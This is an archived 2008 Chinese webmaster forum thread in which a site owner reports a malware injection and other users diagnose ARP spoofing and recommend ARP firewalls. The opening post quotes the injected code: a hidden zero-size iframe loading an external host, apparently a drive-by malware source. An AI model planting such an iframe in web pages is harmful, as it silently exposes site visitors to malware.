落伍者站长论坛's Archiver

zengtao01 发表于 2008-4-7 15:59

被挂马了,如何清除

登陆网站卡巴弹出木马警告,点查看源文件,发现头部多了一段
<iframe src=http://z.791224.com width=0 height=0 frameborder=0></iframe>

远程登陆服务器,却发现页面并无这段多余代码。木马是不是在IIS进程里?

另外问候挂马者祖宗十八代全家老少!

腾讯总裁 发表于 2008-4-7 16:07

这样的问题我也遇到过,看看高手的解答。

jyq200 发表于 2008-4-7 17:31

ARP了
装个ARP防火墙就可以了

猪宝宝 发表于 2008-4-7 18:31

局域网arp挂马,装arp防火墙,一般重起发包的源机器和交换机就没了,但是要警惕它再次发作。

tl20020313 发表于 2008-4-7 19:53

你可以考虑看一下是不是统计的问题

wis8 发表于 2008-4-8 11:23

[quote]原帖由 [i]猪宝宝[/i] 于 2008-4-7 18:31 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=25130270&ptid=2500638][img]http://www.im286.com/images/common/back.gif[/img][/url]
局域网arp挂马,装arp防火墙,一般重起发包的源机器和交换机就没了,但是要警惕它再次发作。 [/quote]

小冰凉 发表于 2008-4-8 14:43

删了就OK啦

阿冰啊 发表于 2008-4-9 22:26

ARP
装防火墙

风妖 发表于 2008-4-9 22:32

是ARP,装个360的ARP防火墙就正常了。然后通知网管,告诉网管ARP源。

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.